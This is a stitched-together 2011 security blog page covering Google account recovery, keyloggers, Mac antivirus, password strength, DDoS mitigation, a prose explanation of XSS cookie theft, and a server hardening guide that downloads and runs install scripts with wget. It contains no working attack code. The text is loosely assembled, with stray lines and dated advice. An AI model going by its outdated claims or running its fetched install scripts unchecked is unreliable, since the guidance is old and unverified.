Wednesday, April 13, 2011

What to do if your Google/gmail account is hacked?

It will be a nightmare for you if your google account gets hacked,Most of the people in these cases waste their money contacting the password recovery services wasting their money,I dont say they dont get back password,But you can do it by putting in some efforts

I will begin with Google. it's a pity thing your account got hacked. in most cases it was you own fault that it got hacked. in rare cases i it the hacked who really did something . you should take care. Read more on how to prevent your self from getting hacked.


Now coming back to the main discussion . you can do the following to once hacked.


Change password:- The first thing you need to do in case your account is hackedis change your password and all security details. in most cases the hacker doesn't has your password but cookies.So once you change it the problem is solved. In case you are not even able to log in use the following link to reset your password

Contact Google:- Once you have performed step one. immediately contact Google.You can use one of the forms based on your account type.You will be asked the exact creation date of your Google Account and also a copy of that original ?Google Email Verification? message. if you are lucky then only google will help you . In any case you will receive a reply from form them.


With Gmail id:- If you use a gmail id to login then use this form to contact google.
Without Gmail id:- If your Google Accounts is not linked to Gmail i.e you dont use gmail id to login then use this form.

Inform all your buddies:- Send a mail to all your buddies informing them that your account has been hacked.Who know what the hacker might have done. 
I was asked by many people to tell me the way to protect your orkut account.PLese reply and show your feed backThis Simple Tutorial will Save you from Spam mails and Hacking Tricks used by Many hackers.
As you know you can hide your primary email address from non-friends but if by mistake you add a unknown person to your friend list, then he/she will be able to see your primary email address which you use to login. He can send dangerous emails (keyloggers etc.) and steal your Orkut account. There are two Methods to be safe:


1. 
Changing Primary Email:
Go To Edit Profle Page of your profile, then click on COntact tab and change your Primary Email address to some other id, which you don't use much. Your login id will remain same but your friends will see your other email id.

2. 
Using Fake EMail id:
It is the most effective way of hiding email id, but it requires a new account, If you have some larger communities and want safety, then follow this method:

 Create a new Orkut account, On the Sign Up page enter any id which does not exist like yourname@yourname.com, me@orkutaccount.com etc.
Then after entering other details, you will be redirected to your home page and with a message "Verify Your Email", Just igonore it and do as stated below
Now Go to google.com, you will see your fake id on the top-right corner yourname@yourname.com, You can see "My Account" Option there.
Go To "My Account Page" and create a gmail id from there. (You can see it under Try Some More)
Done! You have your new login id but your friends will still see your fake id :| Enjoy
 

The smile pockets a rattling controversy. 


Keyloggers have been a major problem today as once they get installed in your computer the hacker can get almost any information, I have written couple of posts on keylogging and reviewed some of the best keyloggersavailable now a days
The program which are specially used to detect and protect your computers from keyloggers are Antiloggers, I have tested lots of Antiloggers and found Zemana Antilogger only which is capable of detecting almost every keylogger.
Normally a keylogger is detected by a good antivirus or Antispyware program, but hackers use some methods such as crypting, hexing, binding etc through which the keylogger can easily Antivirus as well as Antispyware program

Zemana AntiLogger now covers pretty much every aspect of Windows including registry modification and dll injection prevention and protects Windows from other spyware-related techniques with Anti-Keylogger, Anti-SreeenLogger, Anti-WebLogger and Anti-ClipboardLogger tools of its own. Another useful feature this apps has is while-list approach (in contrast to Anti-Virus blacklist approach) meaning it automatically recognizes "safe" programs and does not treat them as "suspects"

For more information on this program and download details visit the following link 
Zemana Antilogger Download


The area of Mac security software is fairly broad to Mac users. The primary aspects of security software for the Mac are antivirus programs, patches and updates for the Mac OS X, and updates from commonly used applications such as web browser Safari, Adobe Shockwave, and Google Chrome.

In general, Mac users should be kept up-to-date on security fixes for all of the listed primary items above. Applying fixes will be automatic in the case of a program like Google Chrome while the Adobe Shockwave product will inform you of updates so long as you are connected to the Internet.
Security vulnerabilities can reach in to Mac email applications as well to where you have what are known as botnets putting out spam email messages using your Mac. That is why you want an antivirus program that is robust and will provide you with security monitoring for emails as well as your hard disk and web site usage. Along with that, it is important to stay current on the latest Mac OS X fixes that apply to your operating system. Checking with Apple's website to ensure your current with security fixes is a good way to confirm the facts. There are also web blogs particular to Mac users that will indicate the latest Mac security software issues and fixes for widely-used products such as Safari.

Antivirus programs are plentiful for the latest Mac OS X versions in use. It becomes harder to find support for antivirus software on older Mac OS X versions. Be aware of end-of-lifesoftware so that you are not caught short when it comes to security. The latest trojan horse viruses that are attacking Mac users are also a good thing to be aware of even if you have solid antivirus program software.

Computer security is a big issue and is constantly playing catch up to those who exploit operating systems flaws, browser code weaknesses, and application program security flaws. Security flaws also exist in such ancillary programs the Mac uses such as Java. Java is used heavily for web-based communications and applications. Exploitations of Java can lead to corruption of your local system hard disk and data files.

To avoid suffering the maladies of a compromised Mac computer system, always stay on top of the latest Mac security software fixes and visit trusted web sites while quickly aborting any unfamiliar web site to you that you were referred to or found wherein you see a lot of pop up advertising and free software checks of your Mac hard disk or statements about your Mac may be infected.

For those Mac users that also run a Windows volume or partition, it is wise to have an equally running antivirus program on the Windows side. There are viruses that will go between both the Windows and Mac sides of your Mac computer. In fact, MS Office products that use visual basic along with macro commands are notorious for impacts from malware and trojans.

The use of a robust antivirus program that will monitor both your Windows and Mac volumes, folders and files is that way to go. 


As you know that passwords are the only form of securityavailable now a days, Its really important for one to create a strong passwords,
Keeping a weak passwords can make you vulnerable to attacks such as Brute force, Dictionary attacks, Rainbow Tables etc.
So in this article I will tell you to create a strong password so you can secure your account from getting hacked 

What makes a strong password?


A password can be considered strong if it contains following things:

  • It needs to contain special characters such as @#$%^&
  • It must be at least 8 characters long.
  • It must not have any common words such as 123, password, your birth date, your login name and any words that can be found in the dictionary,(This will prevent you from getting hacked by a Dictionary Attack)
  • a variation of capitalization and small letters
Alternatively there is a website named www.strongpasswordgenerator.com which automatically generates a strong password for you, The website allows you to choose a password length and also gives you hints through which you can easily memorize the password



Hope you liked the post ! Pass the comments 

Security is a topic I’ve yet to cover here at darkshadow-hacker.blogspot.com, but is a topic that will be the focus of many future articles. If you are involved in the darkshadow-hacker group, it is especially important to be aware of the security of the programs you are investing into and to take measures to keep your personal information secure.

The first thing I want to talk about is DDoS Protection. I’m sure you’ve seen programs claim they have DDoS Protection and I’ll mentione it in my next article,. DDoS Protection is a security measure put in place by a program’s host, or at times a third-party company to protect the website against distributed denial-of-service or DDoS attacks.
A DDoS attack is an intentional attempt to make a targeted website unavailable to visitors. The purpose is to halt the targeted website’s operation and services, and shutdown the system entirely. This is accomplished by sending dramatically increased traffic to the targeted website, slowing the server to a point where it refuses new connections until the server crashes causing the website to go down.
DDoS attacks are accomplished by infecting unprotected computers on the internet with malware or trojan viruses. After these “zombie” computers are infected the malicious programs usually sit idle on the host computer until triggered by the master computer run by the person performing the DDoS attack. At the time of the attack the “zombie” computers with malicious programs all send communication requests to the target of the DDoS attack until the target’s host server crashes. Often there are thousands of infected “zombie” computers across the world that simultaneously attack targeted computers, resulting in slowed response time, overload and eventual crashing of the target’s server. Below is a simple graphic showing a visual representation of an attack.
DDoS Attack
You may be asking how you can prevent DDoS attacks from happening. The first thing you can do is make sure that your computer is not a “zombie.” While protecting your personal computer ultimately does little to prevent DDoS attacks, if everyone would protect their computer this sort of attack would be impossible. Small steps can make a huge difference over time. Plus, who knows what other nasty features the malicious software on your computer could have that could put your personal information at risk. Always have an active, updated antivirus program running on your computer and do frequent scans for spyware, malware and viruses. Below are several free anti-virus and spyware programs I recommend for protecting your computer, I will go into further detail on Personal Protection soon in a future walkthrough article.
I recommend running either AVG Anti-Virus or Microsoft Security Essentials along with Ad-Aware and Spybot S&D on your computer. Utilizing multiple antivirus and spyware removal programs will reduce the chance of having your computer compromised and some of the programs pick-up items left behind by the others. However, if you have a website, or are a HYIP admin looking for hosting for your program, it is essential to take further steps. One of the red flags in my reviews for HYIP programs is whether or not the admin has taken the time to acquire and set-up adequate security for their program.
In their Stopping DDoS Attacks whitepaperBlack Lotus Communications explains the three main strategies to protect a website from DDoS attacks:
  1. The most popular is bandwidth overprovision, when a company purchases additional bandwidth from the Internet Service Provider (ISP) to absorb the harmful traffic in case of a DDoS attack.
  2. The second strategy is to build the DDoS protection infrastructure on the border of the Internet and company network to filter the harmful traffic by using the DDoS-aware Intrusion Detection System (IDS) and firewalls.
  3. The third strategy is the use of hosted DDoS mitigation services offered by ISPs or by companies specializing in these services.
The first strategy, bandwidth overprovision, is not enough to fully protect a website from a DDoS attack,. In this first strategy, the site will purchase additional bandwidth to absorb the DDoS attack’s traffic and perform normally. While this can work against small DDoS attacks, anything significant will shut down the site with little trouble.
The second strategy is not commonly used, but is the third-party solution where a filtering system is put into place to detect DDoS attacks and filter them to keep up the site. As these solutions can be extremely expensive and work best when used in addition to DDoS mitigation services,
The third solution, DDoS mitigation, is where the host of a site receives and analyzes all communication sent to a website and if it is determined to be a DDoS attack, the traffic is displaced and dropped, causing the targeted server never to receive the extreme amounts of traffic, resulting in zero or very little lost website functionality. This sort of protection is extremely expensive to set-up individually; however, web host companies such as Black Lotus Communications already have the infrastructure in place, allowing subscribers to benefit from DDoS protection while under their services. This is the most common solution
That concludes my walkthrough on DDoS attacks, prevention and protection. I hope my explanation answers all your questions and hope you’ve learned some techniques , if you have any questions please let me know.


XSS known as Cross Site Scripting involves the injection of code. What Code? This website (Link) gives great examples of the actual code. By studying this code, a webmaster can get a thorough understanding of the code that can be injected. Without viewing this site negatively, it is a great learning tool. 


Security is always going to be a concern for both developers and ecommerce business owners alike, since providing a secure environment for making transactions is not only a matter of gaining customer trust, it is also a legal requirement. As websites become more interactive they are utilizing more and more client-side scripting, such as JavaScript, to provide a rich user experience. At the same time, user submitted content is also becoming a standard feature of most websites, the combination of which can leave a website open to what is called a Cross Site Scripting (XSS) attack, which can threaten the privacy of your confidential data.

A common XSS attack will utilize JavaScript, which is run locally on a user's computer, to capture some bit of information and deliver it to the attacker. Most commonly, attackers will configure a script that will harvest cookies from a user's machine. The hope is that the script was run while the user was logged into a protected interface that stores user information in a cookie. Once the attacker has the user information, it can be used to log into the victim's website, with full administrative access. Of course, this is just one type of XSS attack, but it is probably the most common one developers need to worry about.
So how is this done? It all seems so abstract, that a piece of scripting code being run by a user and some seemingly insignificant piece of data being stolen can bring the entire castle down. As with most things, an example seems to help. Let's take a website that allows users to post comments. A malicious user might post a comment with HTML code in it, such as a script tag that contains JavaScript code to steal cookie information. The user submits his/her comment to the website, where it is put into an approval queue, and waits for the fun to begin.
The website owner then logs into his/her administrative interface for the website and starts to review comments. As they click to view the comment from our malicious user, the JavaScript is executed by the browser without any knowledge of the website owner. This script (behind the scenes), collects the cookie information for that user’s administrative account, and sends it to the attacker's website. The attacker can then use that information to log into the website owner's administrative interface, where the attacker proceeds to download account information and credit card numbers for the website's customers.
How could this have been prevented? The simple answer is to not allow visitors to post HTML code or any other markup language. In this extreme defense tactic, all HTML code is dynamically stripped from user submitted content when it is received. However, in many cases this is simply not a viable option, and administrators would like their users to be able to post markup code. Developers should look at making sure that HTML code is escaped (and therefore not executed by a browser) when initially viewing user submitted content, and that it is not displayed (allowed to be rendered by a browser) until an administrator has a chance to review it and clear it. Most scripting languages have functions that will automatically strip out or disable HTML code, such as strip_html() in PHP and h() in Ruby.
It's important to remember that we have just outlined one type of Cross Site Scripting attack. There are different variations of XSS attacks that can be used in different ways, so it's important for developers to become familiar with where security holes can exist and how to develop applications that minimize the risk of attack.

Conclusion:-


XSS (Cross Site Scripting) allows code to injected in a website. This code can give a malicious person access to your data and secure information. Getting updates, using firewalls and analyzing applications that produce webpages helps to prevent Cross Site Scripting. Running penetration test that includes this vulnerability helps show weaknesses before you are hacked. Penetration tests should be ran frequently with any web application

HOPE You like this article,

Strong passwords should have a significant length and cannot contain normal words. Only random digits and letters of different case. Such passwords are extremely hard to remember and it takes time to enter. But, even strong passwords have their weaknesses. When you type a password, it can be intercepted by a spy program that logs all your keystrokes. Others can see what you type (even if the password field on the screen is masked, the password can be read by buttons you hit on your keyboard.)


Until now, the only solution was to buy a secure token. A secure token is a hardware key that is used instead of or in addition to your normal password authentication. There are two main problems with the hardware solution, though. First, it is expensive. And second, you can use them only with software that has built-in support for this method of authentication.

But, from now on, you can turn any USB flash drive into a secure token! No need to purchase an additional expensive device. All you need is about 2 megabytes of free space on your flash drive or other USB gadget, such as an MP3 player, PDA or even a USB-pluggable mobile handset.
Strong Password


How does it work?
 Our software, Double Password, installs onto your flash drive. When you type a password, the program intercepts it and converts it into a super-strong password string on-the-fly. You can use simple, easy-to-remember passwords without the risk of being cracked.Another benefit of using Double Password is that nobody can steal your passwords. Spy programs are useless. Even if someone gets the "weak" password that you type on the keyboard, it means nothing. This password will only work when your USB flash is inserted.

While typical hardware locks will work only with software that supports secure tokens, Double Password works with any software. It simply substitutes your weak password with a strong one.Double Password can be effectively used to securely lock your Windows account, to protect your laptop and to bring a new level of security to all software that uses password authentication.

DoS Protection via APF, BFD, DDOS and RootKit

Being a web host, your servers are constantly being attacked by hackers by denial-of-service (DoS) and other brute force attacks. There is no foolproof method to stop 100% of all attacks, but there are ways to protect your servers by applying firewall rules, and detecting and banning attacking IPs.

This article makes use of the APF, BFD, DDoS Deflate and RootKit to detect and protect your server from denial-of-service type attacks. To apply those utilities, please follow the instructions below:

To begin installation, login to your server as a root user.

% ssh -l root [hostname]
root@[hostname]'s password: [password]
Last login: [Date] from [hostname]

APF -- Advanced Policy-based Firewall

Get the latest source from the rfxnetworks, and install the software.
# cd /usr/src
# mkdir utils
# cd utils
# wget http://rfxnetworks.com/downloads/apf-current.tar.gz
# tar xfz apf-current.tar.gz
# cd apf-*
# ./install.sh

Read the README.apf and README.antidos for configuration options. Edit the /etc/apf/conf.apf and modify the following lines to your need.

DEVEL_MODE="0"
IG_TCP_CPORTS="21,22,25,53,80,110,143,443,3306"
IG_UDP_CPORTS="53,111"
USE_AD="1"

By default, APF is setup to run in development mode which flushes firewall rules every 5 minutes. Running in development mode defeats the purpose of running APF, as it will automatically flush every 5 minutes. Configure the Ingress (inbound) TCP and UDP ports that need to be opened. Finally, enable AntiDos by setting USE_AD="1".

Edit the /etc/apf/ad/conf.antidos as you fit necessary, and start the APF firewall.

# apf --start

BFD -- Brute Force Detection

BFD is a shell script which parses security logs and detects authentication failures. It is a brute force implementation without much complexity, and it works in conjunction with a APF (Advanced Policy-based Firewall).

## Get the latest source and untar.
# cd /usr/src/utils
# wget http://rfxnetworks.com/downloads/bfd-current.tar.gz
# tar xfz bfd-current.tar.gz
# cd bfd-*
# ./install.sh
Read the README file, and edit the configuration file located in /usr/local/bfd/conf.bfd.
Find ALERT="0" and replace it with ALERT="1"
Find EMAIL_USR="root" and replace it with EMAIL_USR="username@yourdomain.com"

Edit /usr/local/bfd/ignore.hosts file, and add your own trusted IPs. BFD uses APF and hence it orverrides allow_hosts.rules, so it is important that you add trusted IP addresses to prevent yourself from being locked out.

## Start the program.
# /usr/local/sbin/bfd -s


DDoS Deflate

## Get the latest source
# cd /usr/src/utils
# mkdir ddos
# cd ddos
# wget http://www.inetbase.com/scripts/ddos/install.sh
# sh install.sh
Edit the configuration file, /usr/local/ddos/ddos.conf, and start the ddos.

# /usr/local/ddos/ddos.sh -c

RootKit -- Spyware and Junkware detection and removal tool
Go to Rootkit Hunter homepage, and download the latest release.

## Get the latest source and untar
# cd /usr/src/utils
# wget http://downloads.rootkit.nl/rkhunter-<version>.tar.gz
# tar xfz rkhunter-*.gz
# cd rkhunter
# ./installer.sh
## run rkhunter
# rkhunter -c

Setup automatic protection on System Reboot

## Edit /etc/rc.d/rc.local
## (or similar file depending on Linux version)
## Add the following lines at the bottom of the file

/usr/local/sbin/apf --start
/usr/local/ddos/ddos.sh -c

Note:
The SYN Floods and ICMP DDoS may also be prevented by utilizing the Linux traffic control utility (tc). To view setup instructions, please see relevant sections of Linux Advanced Routing & Traffic Control HOWTO.


Notes from the users:

Some of the users experienced following errors while starting APF.

bash# apf --start

Unable to load iptables module (ip_tables), aborting.

According to Burst and Ryan of r-fx.org, changing the SET_MONOKERN variable in /etc/apf/conf.apf to "1" will correct the problem.

By Sumit Ojha